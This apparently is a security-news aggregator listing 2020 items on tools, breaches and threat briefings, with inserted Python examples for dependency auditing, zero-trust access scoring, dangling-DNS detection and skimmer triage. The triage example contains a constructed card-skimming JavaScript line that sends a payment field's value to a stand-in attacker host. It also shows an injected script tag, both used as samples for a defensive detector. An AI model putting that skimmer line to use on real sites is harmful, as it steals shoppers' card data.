What's new around the internet

Src Date (GMT) Title Description Tags Stories Notes
ZDNet 2020-10-05 07:38:05 Microsoft releases tool to update Defender inside Windows install images (direct link) The new tool supports installation images for Windows 10 (Enterprise, Pro, and Home editions), Windows Server 2019, and Windows Server 2016. Tool
Veracode 2020-10-01 14:10:28 96% of Organizations Use Open Source Libraries but Less Than 50% Manage Their Library Security Flaws (direct link) Most modern codebases depend on open source libraries. In fact, a recent research report sponsored by Veracode and conducted by Enterprise Strategy Group (ESG) found that more than 96 percent of organizations use open source libraries in their codebase. But, shockingly, less than half of these organizations have invested in specific security controls to scan for open source vulnerabilities. [Figure: Percentage of codebase pulled from open source] Why is it important to scan open source libraries? For our State of Software Security: Open Source Edition report, we analyzed the security of open source libraries in 85,000 applications and found that 71 percent have a flaw. The most common open source flaws identified include Cross-Site Scripting, insecure deserialization, and broken access control. When open source libraries are not scanned, these flaws stay exposed to attack. Equifax made headlines by not scanning its open source libraries. In 2017, Equifax suffered a massive data breach through Apache Struts which compromised the data, including social security numbers, of more than 143 million Americans. Following the breach, Equifax's stock fell over 13 percent. The unfortunate reality is that if Equifax had run AppSec scans on its open source libraries and patched the vulnerability, the breach could have been avoided. Why aren't more organizations scanning open source libraries? If 96 percent of organizations use open source libraries and 71 percent of applications have a third-party vulnerability, why is it that less than 50 percent of organizations scan their open source libraries? The main reason is that when application developers add third-party libraries to their codebase, they expect that library developers have scanned the code for vulnerabilities. Unfortunately, you can't rely on library developers to keep your application safe. Approximately 42 percent of the third-party code pulled directly by an application developer has a flaw on first scan. And even if the third-party code appears to be free of flaws, more than 47 percent of third-party code has a transitive flaw that is pulled in indirectly from another library in use. [Figure: Transitive and direct open source vulnerabilities] What are your options for managing library security flaws? First off, it's important to note that most flaws in open source libraries are easy to fix. Close to 74 percent of the flaws can be fixed with an update like a revision or patch. Even high priority flaws are easy to fix: close to 91 percent can be fixed with an update. [Figure: Patching open source flaws] So, when it comes to managing your library security flaws, the concentration should not just be, "How Data Breach Tool Vulnerability Equifax
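The direct-versus-transitive distinction in the Veracode piece above, shown as an added example rather than Veracode's own code or scanner. It walks a constructed, lockfile-style dependency graph with hypothetical package names and a constructed advisory list, reports each vulnerable package as direct or transitive, and records which direct dependency a transitive flaw arrives through, since that is the one the developer has to bump:

```python
"""Direct vs transitive vulnerable dependencies (added example).

Constructed sample data: the dependency graph and the advisory list use
hypothetical package names and versions; they are not from the article.
"""
from collections import deque

# Constructed resolved dependency graph, as a lockfile would record it:
# "name@version" -> packages it requires. The root's edges are the direct
# dependencies the developer chose; everything deeper is transitive.
DEPENDENCY_GRAPH = {
    "app@1.0.0": ["web-framework@2.3.1", "json-utils@1.4.0"],
    "web-framework@2.3.1": ["template-engine@0.9.2", "http-core@3.0.0"],
    "json-utils@1.4.0": ["http-core@3.0.0"],
    "template-engine@0.9.2": [],
    "http-core@3.0.0": ["log-lib@1.1.0"],
    "log-lib@1.1.0": [],
}

# Constructed advisories: (package, versions below this are affected, fixed_in, flaw)
ADVISORIES = [
    ("json-utils", "1.5.0", "1.5.0", "insecure deserialization"),
    ("template-engine", "1.0.0", "1.0.0", "cross-site scripting"),
    ("log-lib", "1.2.0", "1.2.0", "broken access control"),
]


def parse_version(text):
    """Turn '1.4.0' into (1, 4, 0) so versions compare numerically, not as strings."""
    return tuple(int(part) for part in text.split("."))


def shortest_paths(root, graph=DEPENDENCY_GRAPH):
    """Breadth-first walk from the root; returns the shortest path to every package."""
    paths = {root: [root]}
    queue = deque([root])
    while queue:
        node = queue.popleft()
        for dep in graph.get(node, []):
            if dep not in paths:
                paths[dep] = paths[node] + [dep]
                queue.append(dep)
    return paths


def audit(root="app@1.0.0", graph=DEPENDENCY_GRAPH, advisories=ADVISORIES):
    """Match every package in the tree against the advisories.

    A finding is 'direct' when the root requires the package itself and
    'transitive' when it arrives through another library; for a transitive
    finding the fix is applied by bumping the direct dependency that pulls
    it in (path[1]) or by pinning an override in the lockfile.
    """
    findings = []
    for node, path in shortest_paths(root, graph).items():
        if node == root:
            continue
        name, version = node.split("@")
        for pkg, affected_below, fixed_in, flaw in advisories:
            if pkg == name and parse_version(version) < parse_version(affected_below):
                findings.append({
                    "package": node,
                    "flaw": flaw,
                    "kind": "direct" if len(path) == 2 else "transitive",
                    "via": " -> ".join(path),
                    "direct_parent": path[1],
                    "fix": f"update {pkg} to {fixed_in}",
                })
    return findings


def summary(findings):
    """Counts per kind, the number an SCA dashboard would headline."""
    counts = {"direct": 0, "transitive": 0}
    for finding in findings:
        counts[finding["kind"]] += 1
    return counts


if __name__ == "__main__":
    for f in audit():
        print(f"{f['kind']:10} {f['package']:22} {f['flaw']:26} via {f['via']}")
    print(summary(audit()))
```

With the constructed graph, one of the three flaws is in a library the developer chose and two ride in underneath web-framework; the log-lib flaw sits three hops down, which is exactly the case a developer scanning only what they added never sees.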
ZDNet 2020-10-01 13:00:03 With API attacks rising, Cloudflare launches a free API security tool (direct link) Cloudflare launches API Shield, a new service to protect web APIs against attacks. Tool
TechRepublic 2020-10-01 11:44:03 Python programming: Microsoft's new tool makes app testing easier for developers (direct link) Playwright for Python automates end-to-end testing for web apps and works in any browser. Tool
Logpoint 2020-10-01 11:26:19 A Simple Guide to Threat Hunting (direct link) Threats are continually changing and becoming more sophisticated, making it impossible to buy a tool that detects every potential cyberthreat. You can help protect your business by taking a proactive approach to hunting threats. According to the 2020 Verizon Data Breach report, more than 25 percent of breaches took months or longer to discover. This [...] Data Breach Tool Threat
AlienVault 2020-09-29 05:01:00 Zero Trust Architecture explained (direct link) This blog was written by a third party author. With the increase in frequency, sophistication, and cost of cyberattacks, the global focus on cybersecurity is at an all-time high. However, the goalposts for those tasked with protecting businesses have shifted. Hackers have a growing number of ways to compromise a business and frequently look to move laterally within an organization, using credentialed (and often elevated) access. On top of this, insider threats are on the rise, where trusted users take advantage of their access for nefarious purposes. This means that the tried-and-tested concept of perimeter-based security and defenses (where anything located on the corporate network is assumed to be trusted) is no longer enough. Security teams need to shift their thinking from the perimeter to the authentication and access of resources. This means looking at methods of both restricting access and monitoring access requests to ensure those using the environment are doing so appropriately. This is where a Zero Trust Architecture comes in. What is Zero Trust Architecture? Zero Trust Architecture should be a core part of a company's cybersecurity planning, combining identity, access policy, authentication, and more. The concept of Zero Trust is "never trust, always verify", which effectively means assuming that all devices and users represent a potential threat and cannot be trusted until they have been properly authenticated. Once authenticated, users are allowed only the bare minimum access they need to perform their job. Therefore, if a device (or user account) is compromised, Zero Trust aims to ensure that the damage is either mitigated (by not allowing access) or, at worst, limited in scope. The concept of Zero Trust has been growing over the past decade; however, the challenge has been implementing it without sacrificing user experience and productivity. Zero Trust Architecture relies heavily on some critical capabilities, namely identity management, asset management, application authentication, network segmentation, and threat intelligence. The technologies needed to achieve these were once only available to larger organizations but are now readily available in the mainstream. How can an organization implement Zero Trust Architecture? Successfully implementing a Zero Trust Architecture means going beyond rolling out a series of integrated tools and technologies supported by a set of operational policies and authentication requirements. It has to be a strategic initiative, not merely a tool and technology acquisition. That strategy should outline what Zero Trust will look like as it relates to authorization to specific resources, both on-premises and in the cloud, as well as how Zero Trust technologies will interact with data, threat intelligence, public key infrastructure, identity management, and vulnerability management systems. Once this foundation has been established, companies can determine how to further define their Zero Trust Architecture; for example, using software-defined perimeters, micro-segmentation, identity, or a combination thereof. In terms of setting user policy, understanding accountability, authority, and capability is critical to establishing the level of trust of an individual user. The trust algorithm can take a score-based approach, a contextual approach, or an approach in which certain criteria must first be met. When it comes to rolling out the technology to support your Zero Trust environment, it's advisable to run a pilot program first. This will allow you to get the kinks out, adjust KPIs and teach you how to operate in a ZTA overall with limited impact to your business. Pilot programs should focu Tool Vulnerability Threat
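The "trust algorithm" the article mentions, as an added example of a policy decision point that combines the criteria-based and score-based approaches it lists. This is not AlienVault's code; the request attributes, role grants, point weights and thresholds are constructed assumptions. Hard criteria (authenticated identity, a role grant for the resource, no impossible-travel signal against sensitive data) are evaluated first and cannot be outscored; only then does a contextual score decide, with MFA offered as a step-up when that alone would clear the threshold:

```python
"""Score-based, context-aware trust algorithm for a zero-trust policy decision
point (added example). Attribute names, point values, thresholds and role
grants are constructed assumptions, not from the article.
"""
from dataclasses import dataclass


@dataclass
class AccessRequest:
    user: str
    authenticated: bool      # identity provider has verified the user
    mfa: bool                # a second factor was presented this session
    role: str
    device_managed: bool     # enrolled in device management
    device_patched: bool
    disk_encrypted: bool
    network: str             # constructed labels: "corp", "vpn" or "internet"
    impossible_travel: bool  # contextual/threat-intel signal
    resource: str
    sensitivity: str         # "low", "medium" or "high"


# Criteria-based part: which roles may reach which resources at all.
ROLE_GRANTS = {
    "finance": {"ledger", "wiki"},
    "engineer": {"git", "wiki"},
}

# Score-based part: minimum trust score per resource sensitivity.
THRESHOLD = {"low": 30, "medium": 60, "high": 80}
MFA_POINTS = 30


def trust_score(req):
    """Sum contextual signals into a score (max 90 with the constructed weights)."""
    signals = [
        (req.mfa, MFA_POINTS, "mfa"),
        (req.device_managed, 25, "managed device"),
        (req.device_patched, 15, "patched"),
        (req.disk_encrypted, 10, "disk encrypted"),
        (req.network in ("corp", "vpn"), 10, "known network"),
    ]
    score, reasons = 0, []
    for present, points, label in signals:
        if present:
            score += points
            reasons.append(label)
    if req.impossible_travel:
        score -= 50
        reasons.append("impossible travel")
    return score, reasons


def decide(req):
    """Return (decision, reason) where decision is 'allow', 'step_up' or 'deny'."""
    # Criteria that must be met before any score matters.
    if not req.authenticated:
        return "deny", "not authenticated"
    if req.resource not in ROLE_GRANTS.get(req.role, set()):
        return "deny", f"role {req.role!r} has no grant for {req.resource!r}"
    if req.impossible_travel and req.sensitivity == "high":
        return "deny", "impossible travel against a high-sensitivity resource"

    # Contextual score against the resource's threshold.
    score, reasons = trust_score(req)
    needed = THRESHOLD[req.sensitivity]
    if score >= needed:
        return "allow", f"score {score} >= {needed} ({', '.join(reasons)})"
    if not req.mfa and score + MFA_POINTS >= needed:
        return "step_up", f"score {score} < {needed}; MFA would reach {score + MFA_POINTS}"
    return "deny", f"score {score} < {needed} ({', '.join(reasons) or 'no trust signals'})"


def sample(**overrides):
    """Constructed baseline request: finance user on a compliant managed laptop."""
    base = dict(user="alice", authenticated=True, mfa=True, role="finance",
                device_managed=True, device_patched=True, disk_encrypted=True,
                network="internet", impossible_travel=False,
                resource="ledger", sensitivity="high")
    base.update(overrides)
    return AccessRequest(**base)


if __name__ == "__main__":
    cases = [
        ("compliant", sample()),
        ("no mfa", sample(mfa=False)),
        ("byod, no mfa", sample(mfa=False, device_managed=False, device_patched=False,
                                disk_encrypted=False, resource="wiki", sensitivity="low")),
        ("wrong role", sample(role="engineer")),
    ]
    for label, req in cases:
        print(f"{label:14} -> {decide(req)}")
```

Note that the network signal is worth only 10 points: being on the corporate LAN does not get a request anywhere near the high-sensitivity threshold on its own, which is the point of moving trust from the perimeter to identity and device posture.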
The Hacker News 2020-09-25 08:01:52 FinSpy Spyware for Mac and Linux OS Targets Egyptian Organisations (direct link) Amnesty International today exposed details of a new surveillance campaign that targeted Egyptian civil society organizations with previously undisclosed versions of FinSpy spyware designed to target Linux and macOS systems. Developed by a German company, FinSpy is extremely powerful spying software that is sold as a legal law enforcement tool to governments around the world but has also Tool
Pirate 2020-09-23 17:13:02 tko-subs – Detect & Takeover Subdomains With Dead DNS Records (direct link) tko-subs is a tool that helps you detect and take over subdomains with dead DNS records: dangling CNAMEs that point to hosting services or to nothing at all, or NS records that are mistyped. It lets you check whether a subdomain can be taken over because it has a dangling CNAME pointing to a CMS provider (Heroku, GitHub, Shopify, Amazon S3, Amazon CloudFront, etc.) that can be taken over. Tool
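The two checks the tko-subs summary describes, dangling CNAMEs and mistyped NS records, as an added example that is not tko-subs' own code. The zone data and the provider fingerprint list are constructed (the real tool ships its own providers file and queries live DNS); the resolver is a stand-in that answers from that zone, and the example also handles a CNAME loop, which an unbounded chain walk would never return from:

```python
"""Dangling CNAME / NS detection for subdomain-takeover triage (added example,
not tko-subs' own code). The zone and the provider fingerprints below are
constructed; "example.test" is a reserved, never-registered TLD.
"""
from dataclasses import dataclass
from typing import Optional

# Constructed subset of hosting providers whose unclaimed hostnames can be
# registered by anyone, making a dangling CNAME to them a takeover candidate.
PROVIDER_FINGERPRINTS = {
    "herokuapp.com": "Heroku",
    "github.io": "GitHub Pages",
    "myshopify.com": "Shopify",
    "s3.amazonaws.com": "Amazon S3",
    "cloudfront.net": "Amazon CloudFront",
}

# Constructed zone data: name -> list of (rtype, value). An absent name
# answers NXDOMAIN, as a deleted app or an unregistered domain would.
SAMPLE_ZONE = {
    "www.example.test": [("A", "203.0.113.10")],
    "blog.example.test": [("CNAME", "old-blog.herokuapp.com")],      # app deleted
    "cdn.example.test": [("CNAME", "d1234.cloudfront.net")],
    "d1234.cloudfront.net": [("A", "203.0.113.20")],                 # still live
    "shop.example.test": [("CNAME", "store.example-saas.test")],     # vendor gone
    "docs.example.test": [("CNAME", "www.example.test")],
    "dev.example.test": [("NS", "ns1.example-dns.test"),
                         ("NS", "ns2.exmaple-dns.test")],            # typo in ns2
    "ns1.example-dns.test": [("A", "203.0.113.53")],
    "loop.example.test": [("CNAME", "loop2.example.test")],
    "loop2.example.test": [("CNAME", "loop.example.test")],
}


def sample_resolver(name):
    """Stand-in for a DNS query: returns the records or None for NXDOMAIN."""
    return SAMPLE_ZONE.get(name.lower().rstrip("."))


@dataclass
class Finding:
    name: str
    status: str  # ok, nxdomain, dangling_cname, takeover_candidate, dangling_ns, cname_loop
    target: Optional[str] = None
    provider: Optional[str] = None


def provider_for(hostname):
    """Name the takeover-able provider a hostname belongs to, if any."""
    for suffix, provider in PROVIDER_FINGERPRINTS.items():
        if hostname == suffix or hostname.endswith("." + suffix):
            return provider
    return None


def check(name, resolve=sample_resolver, max_hops=8):
    """Follow the CNAME chain from name and classify how it ends."""
    chain = []
    current = name
    for _ in range(max_hops):
        records = resolve(current)
        if records is None:
            if not chain:
                return Finding(name, "nxdomain")
            last = chain[-1]
            provider = provider_for(last)
            if provider:
                return Finding(name, "takeover_candidate", last, provider)
            # Dead target on no known provider: dangling, but claimability
            # depends on whether the target's domain can still be registered.
            return Finding(name, "dangling_cname", last)
        cnames = [value for rtype, value in records if rtype == "CNAME"]
        if cnames:
            chain.append(cnames[0])
            current = cnames[0]
            continue
        dead_ns = [host for rtype, host in records
                   if rtype == "NS" and resolve(host) is None]
        if dead_ns:
            return Finding(name, "dangling_ns", ",".join(dead_ns))
        return Finding(name, "ok", chain[-1] if chain else None)
    return Finding(name, "cname_loop", current)


def scan(names, resolve=sample_resolver):
    return [check(n, resolve) for n in names]


if __name__ == "__main__":
    targets = sorted(n for n in SAMPLE_ZONE if n.endswith(".example.test"))
    for f in scan(targets):
        print(f"{f.name:22} {f.status:19} {f.target or '':28} {f.provider or ''}")
```

Only the Heroku case is reported as a takeover candidate; shop.example.test is just as dangling but claiming it would mean registering the vendor's domain, which is a different check, and dev.example.test is flagged because one of its two delegated nameservers does not exist.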
AlienVault 2020-09-23 05:01:00 What is mobile device management? MDM explained (direct link) This blog was written by a third party author. Not too long ago, the desktop computer was the primary computing device for enterprise employees. With the rise of mobile endpoints like smartphones, laptops and tablets, employees are connecting to corporate networks from a wide variety of places and devices. Today, especially with the popularity of the WFH (work from home) model, managing the multitude of mobile devices is more complicated than ever before. The statistics tell a sobering tale. For example, 70% of breaches originate on the endpoint, making it the number one target for attacks. Even more concerning, according to a recent study, 60% of breaches were linked to a vulnerability where a patch was available but not applied. The moral of the story: mobile device management is critical for any corporate network. What is mobile device management? Mobile device management (MDM) is a software tool for IT departments and administrators that allows management of all mobile endpoints, including smartphones, laptops, tablets, and IoT devices. Endpoints can be owned by either the company or the employee, and the MDM solution can be hosted onsite or in the cloud. The goal of an MDM is to find the right balance between management, productivity and policy compliance. As personal devices proliferate onto enterprise networks, MDM plays a vital role in securing corporate networks while allowing employees to continue to work efficiently. Mobile Device Management software relies on the client/server model to function. Using a management console, the server component allows IT administrators to configure and assign policies. The client component resides on each mobile device and receives whatever directives have been assigned from the management console. MDM is now a mature platform that has seen significant advances. Client-initiated updates are a thing of the past, as modern MDM software can instantly discover any new endpoint making a connection to the network. Today's MDM is much more streamlined. Managing BYOD with MDM The line between a mobile user and an on-premises employee has blurred as almost everyone brings some type of personal device into the workplace. The BYOD (bring your own device) movement in many organizations is no longer a movement but more of a norm. The need to monitor and manage these endpoints has never been greater. While the benefits of BYOD are clear (lower equipment costs and more time available for IT personnel come to mind), if endpoints are not actively managed and monitored, the security risks are significant. Mobile device management is a critical component of any BYOD policy, as it allows the business to maintain control of its company data and how it is accessed. Tablets and smartphones can be difficult enough to manage in the BYOD era. After all, they're arguably less secure than laptops and desktops due to a lack of pre-installed malware protection. But when IoT is added to the mix, especially if employees aren't aware of the security threat it poses, the importance of the MDM multiplies. According to a recent Infoblox report, a staggering 80% of IT professionals surveyed discovered shadow (unreported to the IT department) IoT devices connected to their network, and 29% of them discovered more than 20. These devices could be smart TVs, kitchen devices, cameras, or personal health monitors. We've discussed IoT security before; by default, devices are inherently in Malware Tool Vulnerability Threat
ESET 2020-09-22 17:00:37 New tool helps companies assess why employees click on phishing emails (direct link) NIST's tool can help organizations improve the testing of their employees' phish-spotting prowess. Tool
Wired Threat Level 2020-09-21 14:00:00 A New Tool Detects Counterfeit Whiskey Without Wasting a Drop (direct link) Bogus booze has been infiltrating the market, so physicists found a way to test for authenticity while keeping the precious bottles sealed. Tool ★★★
SecurityAffairs 2020-09-20 09:39:26 Security Affairs newsletter Round 282 (direct link) A new round of the weekly SecurityAffairs newsletter has arrived! Every week the best security articles from Security Affairs, free in your inbox. Gaming hardware manufacturer Razer suffered a data leak. CIRWA Project tracks ransomware attacks on critical infrastructure. Popular Marketing Tool exposes data of users of dating sites. Staples discloses data breach […] Ransomware Data Breach Tool
TechRepublic 2020-09-18 17:56:28 How to encrypt files on your Linux servers with gocryptfs (direct link) Looking for an easy-to-use encryption tool to protect data on your Linux servers? Jack Wallen shows you how to install and use gocryptfs to serve that very purpose. Tool
Anomali 2020-09-15 15:00:00 Weekly Threat Briefing: APT Group, Malware, Ransomware, and Vulnerabilities (direct link) The threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Conti Ransomware, Cryptominers, Emotet, Linux, US Election, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. Figure 1: IOC Summary Charts. These charts summarize the IOCs attached to this briefing and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence. China's 'Hybrid War': Beijing's Mass Surveillance of Australia and the World for Secrets and Scandal (published: September 14, 2020) A database containing records on 2.4 million people has been leaked from a Shenzhen company, Zhenhua Data, believed to have ties to the Chinese intelligence service. The database contains personal information on over 35,000 Australians and prominent figures, and 52,000 Americans. This includes addresses, bank information, birth dates, criminal records, job applications, psychological profiles, and social media. Politicians, lawyers, journalists, military officers, media figures, and Natalie Imbruglia are among the Australians recorded in the database. While much of the information is public, there is also non-public information, contributing to claims that China is developing a mass surveillance system. Recommendation: Users should always remain vigilant about the information they put out into the public and avoid posting personal or sensitive information online. Tags: China, spying. US Criminal Court Hit by Conti Ransomware; Critical Data at Risk (published: September 11, 2020) The Fourth District Court of Louisiana, part of the US criminal court system, appears to have become the latest victim of the Conti ransomware. The court's website was attacked and used to steal numerous court documents related to defendants, jurors, and witnesses before the Conti ransomware was installed. Evidence of the data theft was posted to the dark web. Analysis of the malware by Emsisoft threat analyst Brett Callow indicates that the ransomware deployed in the attack was Conti, which has code similarity to another ransomware strain, Ryuk. The Conti group, believed to be behind this ransomware-as-a-service, is sophisticated and, because it keeps a large portion of the ransoms paid, is motivated to avoid detection and keep developing advanced attack tools. This attack also used the Trickbot malware in its exploit chain, as Ryuk campaigns do. Recommendation: Defense in depth, including vulnerability remediation and scanning, monitoring, endpoint protection, backups, etc., is key to thwarting increasingly sophisticated attacks. Ransomware attacks are particularly attractive to attackers because each successful attack opens multiple streams of income. The attackers can not only extort a ransom to decrypt the victim's files (especially where the victim finds they do not have appropriate disaster recovery plans), but can also monetize the exfiltrated data directly and/or use the data to aid future attacks. This technique is increasingly used in supply chain compromises to build difficult-to-detect spearphishing attacks. Tags: conti, ryuk, ransomware. Ransomware Malware Tool Vulnerability Threat Conference APT 35 APT 28 APT 31 ★★★
Veracode 2020-09-14 15:51:05 43% of Orgs Think DevOps Integration Is Critical to AppSec Success (direct link) It's no secret that the rapid speed of modern software development means an increased likelihood of risky flaws and vulnerabilities in your code. Developers are working fast to hit tight deadlines and create innovative applications, but without the right security solutions integrated into your processes, it's easy to hit security roadblocks or let flaws slip through the cracks. We recently dug through the ESG survey report, Modern Application Development Security, which uncovers some interesting data about the state of DevOps integration in the modern software development process. As the report states, DevOps integration is critical for improving your organization's application security (AppSec) program, as automating and integrating solutions removes some of the manual work that can slow teams down and moves security testing into critical parts of the development process. "DevOps integration reduces friction and shifts security further left, helping organizations identify security issues sooner," the report says. "While developer education and improved tools and processes will no doubt also improve programs, automation is central to modern application development practices." [Figure: Level of DevOps and AppSec Integration] According to the survey results, nearly half of organizations agree; 43 percent believe that DevOps integration is the most important piece of the puzzle for improving their AppSec programs. The report also outlines 10 elements of the most successful AppSec programs, and topping that list is ensuring that your AppSec controls are highly integrated into the CI/CD toolchain. Integration challenges For some survey respondents, that's easier said than done. Nearly a quarter (23 percent) said that one of their top challenges with current AppSec testing solutions is that they have poor integration with existing development and DevOps tools, while 26 percent said they experience difficulty with, or lack of, integration between different AppSec vendor tools. AppSec tool proliferation is a problem too, with a sizeable 72 percent of organizations using more than 10 tools to test the security of their code. "Many organizations are employing so many tools that they are struggling to integrate and manage them. This all too often results in a reduction in the effectiveness of the program and directs an inordinate amount of resources to managing tools," they explain further. So where should organizations like yours start? By selecting a vendor with a comprehensive offering of security solutions that integrate to help you cover those bases and consolidate solutions while reducing complexity. That's where Veracode shines. We bring the security tests and training tools you need together into one suite so that you can consolidate and keep innovating, securely. And your organization can scale at a lower cost, too: our range of integrations and Veracode solutions are delivered through the cloud for less downtime and more efficiency. Simplifying AppSec We aim to simplify your AppSec program by combining five key analysis types in one solution, all integrated into your develo Tool
SecurityAffairs 2020-09-14 08:42:52 (Déjà vu) Popular Marketing Tool exposes data of users of dating sites (direct link) Personal details of hundreds of thousands of users of dating sites were exposed online earlier this month. An Elasticsearch server containing personal details of hundreds of thousands of dating site users was exposed online without authentication. The unsecured database was discovered by security researchers from vpnMentor at the end of August. "vpnMentor's research team recently received a report from […] Tool
SecureMac 2020-09-10 13:04:00 Checklist 198: Listener Tracking in Podcasts with Rob Walch (direct link) Did you know that some podcasts actually track their listeners? Rob joins us today to talk about how the tracking occurs and about a new tool on the way to fight it. Tool
TechRepublic 2020-09-09 21:45:16 How to fix common Wi-Fi problems with the macOS built-in Wireless Diagnostics app (direct link) There's no reason to turn to third-party tools for solutions to your Wi-Fi woes. macOS has a built-in tool that can scan your wireless network and make all the recommendations that a paid tool does. Tool
Anomali 2020-09-09 16:24:00 Weekly Threat Briefing: Skimmer, Ransomware, APT Group, and More (direct link) The threat intelligence stories in this iteration of the Weekly Threat Briefing discuss the following topics: APT, Baka, DDoS, Netwalker, PyVil, Windows Defender, TA413, and Vulnerabilities. The IOCs related to these stories are attached to the Weekly Threat Briefing and can be used to check your logs for potential malicious activity. Figure 1: IOC Summary Charts. These charts summarize the IOCs attached to this briefing and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence. 'Baka' Javascript Skimmer Identified (published: September 6, 2020) Visa has issued a security alert based on identification of a new skimmer, named "Baka". Based on analysis by Visa Payment Fraud Disruption, the skimmer appears to be more advanced than most, loading dynamically and using an XOR cipher for obfuscation. The attackers behind Baka inject it into checkout pages using a script tag, with the skimming code downloaded from the command and control (C2) server and executed in memory to steal customer data. Recommendation: eCommerce site owners must take every step necessary to secure their data and safeguard their payment card information. Visa has also released best practices in the security advisory. Tags: Baka, Javascript, Skimmer. Netwalker Ransomware Hits Argentinian Government, Demands $4 Million (published: September 6, 2020) The Argentinian immigration agency, Dirección Nacional de Migraciones, suffered a ransomware attack that shut down border crossings. After receiving many tech support calls, the computer networks were shut down to prevent further spread of the ransomware, which led to a cessation of border crossings until systems were up again. The ransomware used in this attack is Netwalker, which left a ransom note initially demanding $2 million; when this wasn't paid in the first week, the ransom increased to $4 million. Recommendation: Ransomware can potentially be blocked by using endpoint protection solutions (HIDS). Always keep your important files backed up following the 3-2-1 rule: have at least 3 different copies, on 2 different media, with 1 off-site. In the case of ransomware infection, the affected system must be wiped and reformatted. Other devices on the network should be checked for similar infections. Always check for a decryptor before considering payment; avoid payment at all costs. Ransomware should be reported to law enforcement agencies, who are doing their best to track these actors and prevent ransom from being a profitable business for cyber criminals. MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486. Tags: Argentina, Government, Netwalker, Ransomware. No Rest for the Wicked: Evilnum Unleashes PyVil RAT (published: September 3, 2020) Researchers on the Cybereason Nocturnus team have published their research tracking the threat actor group known as Evilnum and an ongoing change in their tooling and attack procedures. This includes a new Remote Access Trojan (RAT), written in Python, that they have begun to use. The actor group attacks targets in the financial services sector using highly targeted spearphishing. The phishing lures leverage "Know Your Customer" (KY Ransomware Malware Tool Vulnerability Threat Medical APT 38 APT 28 ★★★★
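Two triage checks for a client-side skimmer of the kind the Baka item above describes, as an added example that is generic and not Visa's analysis or Baka's actual code. The first inventories the script tags on a checkout page and flags any external source that is not on the site's first-party allowlist (the injection vector the briefing names); the second brute-forces a single-byte XOR key from a blob, using the fact that the decoded JavaScript must be printable and must reference `document`. The page HTML, the allowlisted hosts, the key and the payload are all constructed here:

```python
"""Skimmer triage: unexpected script tags and single-byte XOR recovery
(added example; generic, not Visa's analysis of Baka). The page HTML,
allowlist, key and payload below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed first-party script origins for the checkout page.
ALLOWED_SCRIPT_HOSTS = {"shop.example.test", "static.example.test"}


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf).strip())
            self._in_inline = False


def unexpected_scripts(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return external script URLs whose host is not on the first-party allowlist.

    Relative URLs have no host and are same-origin, so they are not flagged.
    """
    parser = ScriptCollector()
    parser.feed(html)
    return [src for src in parser.external
            if urlparse(src).hostname is not None
            and urlparse(src).hostname not in allowed]


def xor_bytes(data, key):
    """Single-byte XOR: the same call obfuscates and deobfuscates."""
    return bytes(b ^ key for b in data)


def recover_xor_key(blob, marker=b"document"):
    """Brute-force a single-byte XOR key.

    The right key yields printable ASCII that contains a token a DOM-reading
    skimmer can hardly avoid (default: 'document'); returns (key, plaintext)
    or (None, None) when no key fits.
    """
    for key in range(1, 256):
        plain = xor_bytes(blob, key)
        if marker in plain and all(32 <= b < 127 or b in (9, 10, 13) for b in plain):
            return key, plain.decode("ascii")
    return None, None


# Constructed checkout page: one first-party script plus one injected tag.
SAMPLE_PAGE = """<html><body>
<script src="https://static.example.test/checkout.js"></script>
<script src="https://cdn-metrics.example-attacker.test/l.js"></script>
<script>window.__cfg = {"step": "payment"};</script>
</body></html>"""

# Constructed payload: what an injected loader would fetch and XOR-decode.
SAMPLE_KEY = 0x5A
SAMPLE_BLOB = xor_bytes(
    b"var c=document.querySelector('#card');"
    b"c.addEventListener('change',function(){new Image().src="
    b"'https://c2.example-attacker.test/?d='+btoa(c.value);});",
    SAMPLE_KEY,
)

if __name__ == "__main__":
    print("unexpected:", unexpected_scripts(SAMPLE_PAGE))
    key, js = recover_xor_key(SAMPLE_BLOB)
    print(f"key=0x{key:02x}\n{js}")
```

The allowlist check is the cheap control that catches the injection itself, and it is also the logic a Content Security Policy with an explicit `script-src` enforces in the browser; the XOR recovery is only for analysts handed a retrieved blob, since a key of one byte gives 255 candidates and the printable-plus-marker filter picks out the right one.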
ZDNet 2020-09-09 10:58:14 Weave Scope is now being exploited in attacks against cloud environments (direct link) The legitimate cloud infrastructure monitoring tool has been added to attacker arsenals. Tool
TechRepublic 2020-09-08 15:45:46 How to install the oVirt virtual machine manager on CentOS 8 (direct link) If you're looking for a web-based virtual machine manager, oVirt might be the tool for you. Jack Wallen shows you how to install this powerful, open source solution on CentOS 8. Tool
TechRepublic 2020-09-04 20:24:16 How to access the Android Battery Usage tool (direct link) Not getting the most out of your Android battery life? Jack Wallen shows you how to squeeze a bit more juice from that device. Tool ★★
NoticeBored 2020-09-04 14:26:51 NBlog Sept 4 - standardising ISMS data interfaces (direct link) We've been chatting on the ISO27k Forum lately about using various IT systems to support ISO27k ISMSs. This morning, in response to someone saying that a particular tool which had been recommended did not work for them, Simon Day made the point that "Each organisation trying to implement an ISMS will find its own way based on their requirements." Having surveyed the market for ISMS products recently, I followed up with my usual blurb about organisations having different information risks and business situations, hence their requirements in this area are bound to differ, and in fact vary dynamically (in part because organisations mature as they gain experience with their ISMS: their needs change). The need for flexibility is why the ISO27k standards are so vague (essentially: figure out your own requirements by identifying and evaluating your information risks using the defined governance structure - the ISMS itself), rather than explicitly demanding particular security controls (as happens with PCI-DSS). ISO27k is designed to apply to any organisation. That thought sparked a creative idea that I've been contemplating ever since: wouldn't it be wonderful if there was a standard for the data formats allowing us to migrate easily between IT systems supporting ISO27k ISMSs? I'm idly thinking about a standard file format with which to specify information risks (threats, 